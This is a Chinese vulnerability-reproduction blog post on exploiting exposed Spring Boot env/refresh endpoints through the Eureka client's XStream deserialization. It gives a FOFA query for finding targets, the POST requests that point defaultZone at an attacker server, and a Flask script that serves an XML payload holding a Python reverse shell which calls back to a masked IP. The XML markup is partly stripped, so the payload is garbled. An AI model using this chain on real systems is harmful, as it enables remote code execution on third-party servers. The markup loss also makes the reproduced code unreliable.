Spring未授权REC利用方式二(env接口/eureka xstream RCE)

一、漏洞成因

  spring-cloud-starter-netflix-eureka-client组件使用 Xstream 序列化功能,在一定条件下触发REC。

  (XStream:XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。)

二、利用条件

  eureka-client < 1.8.7

  env/refresh 接口暴露

  spring boot 版本范围未知(未找到相关版本研究文章)

三、漏洞确认

  env接口暴露,找到包含相关漏洞组件

   本地环境搭建的和参考文章环境不太一样,复现过程无法实现。

 四、漏洞复现

  fofa   app="Eureka-Server"

  1. 访问env接口,搜索 Eureka 确认使用该组件  

   2. 修改post请求 ,使用dnslog验证是否可以出网

    Content-Type: application/x-www-form-urlencoded

    eureka.client.serviceUrl.defaultZone=http://xxx.bjohry.dnslog.cn

  3.refresh 接口刷新

     Content-Type: application/x-www-form-urlencoded

    

   4.修改python脚本,最下面的那个是自己启的web端口,中间那个是反弹接收shell的端口

#!/usr/bin/env python
# coding: utf-8
# -**- Author: LandGrey -**-

from flask import Flask, Response

app = Flask(__name__)


@app.route('/', defaults={'path': ''})
@app.route('/', methods=['GET', 'POST'])
def catch_all(path):
    xml = """
  
    
      
        
          
            
              
                
                  
                  
                    
                       /bin/bash
                       -c
                       python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("****",8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
                    
                    false
                  
                
                
                  
                    java.lang.ProcessBuilder
                    start
                    
                  
                  foo
                
                foo
              
              
            
            
            
          
        
      
    
  
"""
    return Response(xml, mimetype='application/xml')


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=8081)

 启动之后访问是这样的,xml里python反弹shell的命令

   5.重新更新到地址,后直接刷新接口refresh

    eureka.client.serviceUrl.defaultZone=http://***:8080/xstream

   

   6.下面的是python脚本运行后的,靶机会不断往回请求

  成功接收到shell 并执行命令

   

参考链接:

  https://www.jianshu.com/p/91a5ca9b7c1c

  https://github.com/LandGrey/SpringBootVulExploit

  https://www.freebuf.com/column/234719.html

  https://blog.csdn.net/blueheart20/article/details/72827666    //云服务器安装python3无pip解决方法

漏洞复现

相关

ThinkCMF v5.0.190111 后台代码执行漏洞复现

CVE-2019-0708(非蓝屏poc)远程桌面代码执行漏洞复现

CNVD-2021-30167:用友NC BeanShell远程代码执行漏洞复现

fastjson 反序列化漏洞复现

Jackson远程代码执行漏洞复现(不使用vulhub,手写transletBytecodes字段)

CVE-2019-12409 Apache Solr RCE 漏洞复现利用

Redis未授权访问 漏洞复现

[php反序列化] CVE-2020-15148(Yii2 反序列化漏洞) 漏洞复现

Log4j2漏洞复现

ThinkPHP(5.0.23-rce)任意代码执行漏洞复现及原理

springboot漏洞复现(CVE-2022-22965)

MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞)

标签